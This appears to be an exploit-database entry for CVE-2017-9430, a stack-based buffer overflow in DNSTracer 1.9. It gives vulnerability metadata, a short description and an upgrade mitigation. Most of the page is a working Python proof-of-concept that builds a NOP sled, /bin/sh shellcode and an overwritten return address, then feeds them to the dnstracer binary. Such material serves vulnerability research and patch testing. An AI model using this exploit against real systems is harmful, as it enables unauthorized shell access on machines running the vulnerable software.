DNSTracer 1.9 - Buffer Overflow

vendor:

DNSTracer

by:

j0lama

9,8

CVSS

CRITICAL

Buffer Overflow

120

CWE

Product Name: DNSTracer

Affected Version From: 1.9

Affected Version To: 1.9

Patch Exists: YES

Related CWE: CVE-2017-9430

CPE: a:mavetju:dnstracer:1.9

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu 12.04

2017

DNSTracer 1.9 – Buffer Overflow

DNSTracer 1.9 is vulnerable to a stack-based buffer overflow vulnerability. This vulnerability is caused by a lack of proper boundary checks when handling user-supplied input. An attacker can exploit this vulnerability by supplying a specially crafted input that contains malicious code, which will be executed in the context of the application.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of DNSTracer.

Source

Exploit-DB raw data:

# Exploit Title: DNSTracer 1.9 - Buffer Overflow
# Google Dork: [if applicable]
# Date: 03-08-2017
# Exploit Author: j0lama
# Vendor Homepage: http://www.mavetju.org/unix/dnstracer.php
# Software Link: http://www.mavetju.org/download/dnstracer-1.9.tar.gz
# Version: 1.9
# Tested on: Ubuntu 12.04
# CVE : CVE-2017-9430
# Bug report: https://www.exploit-db.com/exploits/42115/
# Vulnerability analysis: http://jolama.es/temas/dnstracer-exploit/index.php


# Proof of Concept
import os
from subprocess import call

def run():
    try:
        print "\nDNSTracer Stack-based Buffer Overflow"
        print "Author: j0lama"
        print "Tested with Dnstracer compile without buffer overflow protection"

        nops = "\x90"*1006
        shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        filling = "A"*24
        eip = "\x2f\xeb\xff\xbf"

        #buf size = 1057
        buf = nops + shellcode + filling + eip

        call(["./dnstracer", buf])

    except OSError as e:
        if e.errno == os.errno.ENOENT:
            print "\nDnstracer not found!\n"
        else:
            print "\nError executing exploit\n"
        raise


if __name__ == '__main__':
    try:
        run()
    except Exception as e:
        print "Something went wrong"